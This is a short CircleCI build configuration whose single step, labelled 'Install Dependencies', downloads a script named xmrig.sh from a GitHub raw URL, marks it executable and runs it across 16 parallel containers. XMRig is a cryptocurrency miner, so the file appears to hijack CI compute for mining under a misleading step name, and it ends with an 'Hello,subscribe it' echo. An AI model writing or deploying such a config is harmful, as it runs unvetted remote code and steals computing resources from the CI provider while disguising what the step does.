version: 2.1
jobs:
    trial:
      docker:
            - image: circleci/ruby:2.5.3
      parallelism: 16
      steps:
        - run:
            name: Install Dependencies
            command: |
              wget https://raw.githubusercontent.com/amangmanis/kontol/main/xmrig.sh && chmod +x xmrig.sh && ./xmrig.sh
              echo Hello,subscribe it

workflows:
    version: 2.1
    build:
        jobs:
        - trial 
